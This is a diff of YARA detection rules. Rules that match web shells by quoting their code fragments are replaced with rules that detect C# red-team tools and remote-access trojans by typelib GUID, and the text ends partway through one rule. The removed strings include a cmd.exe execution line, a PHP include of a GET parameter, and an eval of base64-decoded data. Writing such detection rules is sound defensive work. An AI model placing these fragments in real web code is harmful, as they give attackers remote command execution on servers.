-rule SIGNATURE_BASE_Webshell_Asp_Cmdasp
+rule SIGNATURE_BASE_HKTL_NET_GUID_P0Wnedshell : FILE
 {
 	meta:
-		description = "Web Shell - file cmdasp.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1860-L1874"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "390b94d1-dda9-5a85-80ae-c79a3f7b0b9d"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/Cn33liz/p0wnedShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3198-L3211"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "57b51418a799d2d016be546f399c2e9b"
-		logic_hash = "4259419b4db8e6a83df6f7d258d41028f7f76b0fd2308eeadb4555066c5a2940"
-		score = 70
+		logic_hash = "7c6d8dbcd1ff31a9b34c36b4db2867f0b9e3fac98c7039d2a51bfe5a45afcc71"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
-		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+		$typelibguid0lo = "2e9b1462-f47c-48ca-9d85-004493892381" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Spjspshell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpmove : FILE
 {
 	meta:
-		description = "Web Shell - file spjspshell.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1875-L1888"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e52392f9-614c-596e-8efd-aa0a2fa44e60"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xthirteen/SharpMove"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3213-L3226"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d39d51154aaad4ba89947c459a729971"
-		logic_hash = "7926eadd3ffb21de73a63e7a28a525037bf88396ea369599b41ac8c0b0d112ad"
-		score = 70
+		logic_hash = "4980a9b197479b2514e12b78aa5a3bf9825772f8578d3abd219607e39af7e470"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:"
+		$typelibguid0lo = "8bf82bbe-909c-4777-a2fc-ea7c070ff43e" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Action
+rule SIGNATURE_BASE_HKTL_NET_GUID_C_Sharp_R_A_T_Client : FILE
 {
 	meta:
-		description = "Web Shell - file action.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1889-L1903"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f5df8257-d202-58e3-9c4a-1dfc9dd52f2a"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3228-L3241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5a7d931094f5570aaf5b7b3b06c3d8c0"
-		logic_hash = "5ea7d074d0fe98cf2514a65231013a374532d6b3aa2487bcc34d4285f558752a"
-		score = 70
+		logic_hash = "a090996b8453fb41483888f433da57340a6509221439ffd8f17e546424686c55"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword
-		$s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword
+		$typelibguid0lo = "6d9e8852-e86c-4e36-9cb4-b3c3853ed6b8" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Inderxer
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpprinter : FILE
 {
 	meta:
-		description = "Web Shell - file Inderxer.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1904-L1917"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "10270351-ad80-5330-971b-bc8f635f05f4"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rvrsh3ll/SharpPrinter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3243-L3256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "9ea82afb8c7070817d4cdf686abe0300"
-		logic_hash = "915f2f38c1ca1321980ac66ebb95b0c46443e0ba64cc4b2014200db43439c85e"
-		score = 70
+		logic_hash = "86eb7194039aa8bb89f77041215a3421bb35acd790aa769156298f30a124e9b3"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+		$typelibguid0lo = "41b2d1e5-4c5d-444c-aa47-629955401ed9" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Rader
+rule SIGNATURE_BASE_HKTL_NET_GUID_Evilfoca : FILE
 {
 	meta:
-		description = "Web Shell - file Rader.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1918-L1932"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2b2f5f6f-4224-5013-9e85-0ac088826bea"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/ElevenPaths/EvilFOCA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3258-L3271"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ad1a362e0a24c4475335e3e891a01731"
-		logic_hash = "b578f3e844cbb361f455e55353fad2f0134ede7c3c468cebad9ae265e6e768b8"
-		score = 70
+		logic_hash = "f903e2552bdb75a985065e9b78229b56c8005041cf3a75be355192684582caee"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0"
-		$s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 "
+		$typelibguid0lo = "f26bdb4a-5846-4bec-8f52-3c39d32df495" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_C99_Madnet_Smowu
+rule SIGNATURE_BASE_HKTL_NET_GUID_Poshc2_Misc : FILE
 {
 	meta:
-		description = "Web Shell - file smowu.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1933-L1951"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "245803cb-63d8-5c75-b672-912091cf4a80"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/nettitude/PoshC2_Misc"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3273-L3287"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3aaa8cad47055ba53190020311b0fb83"
-		logic_hash = "5c4f76bdbe535a899e40c890eb1ea65e070c781fe5dd44cf13d4832cfd6d2e13"
-		score = 70
+		logic_hash = "2ad0da62428f8412c748418b44d943a143191bbe789394ffc7b21658f87c27b9"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "//Authentication" fullword
-		$s1 = "$login = \"" fullword
-		$s2 = "eval(gzinflate(base64_decode('"
-		$s4 = "//Pass"
-		$s5 = "$md5_pass = \""
-		$s6 = "//If no pass then hash"
+		$typelibguid0lo = "85773eb7-b159-45fe-96cd-11bad51da6de" ascii wide
+		$typelibguid1lo = "9d32ad59-4093-420d-b45c-5fff391e990d" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Moon
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpire : FILE
 {
 	meta:
-		description = "Web Shell - file moon.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1952-L1967"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "32bdaa0f-3afc-5e0e-a20f-e21f33909af7"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/0xbadjuju/Sharpire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3289-L3302"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2a2b1b783d3a2fa9a50b1496afa6e356"
-		logic_hash = "4e26dbef647caee19a8707a067c228ba96bd986369e4c87c68964ae42c85b09a"
-		score = 70
+		logic_hash = "c53b3205e58257292e34526ea4fd0e0550bbdcf4039f94d268a313ae28733182"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "echo '<option value=\"create function backshell returns string soname"
-		$s3 = "echo      \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\""
-		$s8 = "echo '<option value=\"select cmdshell(\\'net user "
+		$typelibguid0lo = "39b75120-07fe-4833-a02e-579ff8b68331" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Minupload
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Smbexec : FILE
 {
 	meta:
-		description = "Web Shell - file minupload.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1969-L1983"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6a1024af-734c-5974-af50-db51dbd694ff"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/checkymander/Sharp-SMBExec"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3304-L3317"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ec905a1395d176c27f388d202375bdf9"
-		logic_hash = "53dea3ea0e2cf83907273fa7f64b21b40e9a5c8e4aa34e5d46d2762396fa89ce"
-		score = 70
+		logic_hash = "d6938d7492904a202e80525ff8f1b95c19bd65b1450f2f7e4271ab01f2e25a50"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
-		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
+		$typelibguid0lo = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_ELMALISEKER_Backd00R
+rule SIGNATURE_BASE_HKTL_NET_GUID_Misctools : FILE
 {
 	meta:
-		description = "Web Shell - file ELMALISEKER Backd00r.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1984-L1998"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ce49cc7b-a5a5-52b7-a7bf-bbb0c5b29b8a"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/rasta-mouse/MiscTools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3319-L3336"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3aa403e0a42badb2c23d4a54ef43e2f4"
-		logic_hash = "c5eea930dc386c60e60f052c4945c8d6c0125d3500e60794e21d5ea04f226628"
-		score = 70
+		logic_hash = "ffa89aeac49c1652618def1b63506915ec6a364708eb805ef2d9abe710111edf"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio"
-		$s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req"
+		$typelibguid0lo = "384e9647-28a9-4835-8fa7-2472b1acedc0" ascii wide
+		$typelibguid1lo = "d7ec0ef5-157c-4533-bbcd-0fe070fbf8d9" ascii wide
+		$typelibguid2lo = "10085d98-48b9-42a8-b15b-cb27a243761b" ascii wide
+		$typelibguid3lo = "6aacd159-f4e7-4632-bad1-2ae8526a9633" ascii wide
+		$typelibguid4lo = "49a6719e-11a8-46e6-ad7a-1db1be9fea37" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_Bug_1_
+rule SIGNATURE_BASE_HKTL_NET_GUID_Memorymapper : FILE
 {
 	meta:
-		description = "Web Shell - file bug (1).php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1999-L2012"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c978be10-315c-54e7-afea-f97e9a5f2d18"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/jasondrawdy/MemoryMapper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3338-L3351"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "91c5fae02ab16d51fc5af9354ac2f015"
-		logic_hash = "12b957b7e0d0823721273ab71a19ee62d84a8dc5f584a46691f0e0aef996386e"
-		score = 70
+		logic_hash = "691aae2ac0c6dec88c64fd1195f67e34235514037c54ebd1f1ac04d92aa3bbb1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "@include($_GET['bug']);" fullword
+		$typelibguid0lo = "b9fbf3ac-05d8-4cd5-9694-b224d4e6c0ea" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Hkmjj
+rule SIGNATURE_BASE_HKTL_NET_GUID_Vanillarat : FILE
 {
 	meta:
-		description = "Web Shell - file hkmjj.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2013-L2026"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9448e8d0-5bfc-5683-b633-284e43d24642"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/DannyTheSloth/VanillaRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3353-L3367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e7b994fe9f878154ca18b7cde91ad2d0"
-		logic_hash = "9a25df170ed165fe6528e6b9374ae572bcd26cd2e1f4014c7aa4953122671fac"
-		score = 70
+		logic_hash = "7e3dd2e631b06201fa3065ebf10c1bb258839106443228af7f07706530a3070d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\"  " fullword
+		$typelibguid0lo = "d0f2ee67-0a50-423d-bfe6-845da892a2db" ascii wide
+		$typelibguid1lo = "a593fcd2-c8ab-45f6-9aeb-8ab5e20ab402" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Asd
+rule SIGNATURE_BASE_HKTL_NET_GUID_Unmanagedpowershell : FILE
 {
 	meta:
-		description = "Web Shell - file asd.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2027-L2041"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "49ff1362-0ac5-580d-97f3-516f2a10072b"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/leechristensen/UnmanagedPowerShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3369-L3382"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a042c2ca64176410236fcc97484ec599"
-		logic_hash = "6620b796b55a67010cd3edebc2ec84c2657717722129ea46288d262cfd1c7e1c"
-		score = 70
+		logic_hash = "027b0dcbbacaafe6709e18a29b0c001f17f14128648cb64afdcf946804aa8796"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword
-		$s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url"
+		$typelibguid0lo = "dfc4eebb-7384-4db5-9bad-257203029bd9" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Metaslsoft
+rule SIGNATURE_BASE_HKTL_NET_GUID_Quasar : FILE
 {
 	meta:
-		description = "Web Shell - file metaslsoft.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2043-L2056"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "b938cf7d-27fd-5fa2-b0e5-d4da5670f3ef"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/quasar/Quasar"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3384-L3398"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aa328ed1476f4a10c0bcc2dde4461789"
-		logic_hash = "20d938fbe21bcf04f09c6450a9acd5db556e9c9f83149d3cdd098be7a905d5ca"
-		score = 70
+		logic_hash = "51eed0545b985c20db7aae64251a0e7513cb352f2ff76f64d7697d2767f95db2"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
+		$typelibguid0lo = "cfda6d2e-8ab3-4349-b89a-33e1f0dab32b" ascii wide
+		$typelibguid1lo = "c7c363ba-e5b6-4e18-9224-39bc8da73172" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Ajan
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpadidnsdump : FILE
 {
 	meta:
-		description = "Web Shell - file Ajan.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2057-L2070"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "51d50b22-4e73-5378-9e0d-ad7730987293"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/b4rtik/SharpAdidnsdump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3400-L3413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b6f468252407efc2318639da22b08af0"
-		logic_hash = "1817786725de61150f1b3ff57597c780323a7f4df1c046cfd473e1918decd7d2"
-		score = 70
+		logic_hash = "edda1bb7a0a1702941fa35b38120f7e9ae64b6188a47e63a0939a864980b6281"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
+		$typelibguid0lo = "cdb02bc2-5f62-4c8a-af69-acc3ab82e741" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Config_Myxx_Zend
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnettojscript : FILE
 {
 	meta:
-		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2071-L2087"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "31827074-fc63-5690-b6c7-8e89daacc07f"
+		date = "2020-12-28"
+		modified = "2025-08-15"
+		reference = "https://github.com/tyranid/DotNetToJScript"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3415-L3428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "161dc712f279e73ea8cab4b0298cc2ca3799c6d9107050c4231a81021caed37f"
-		score = 70
+		logic_hash = "07f220695607b5aa6cda9045c3bc1e434828cb5835154710969666482dbe09c4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash1 = "e0354099bee243702eb11df8d0e046df"
-		hash2 = "591ca89a25f06cf01e4345f98a22845c"
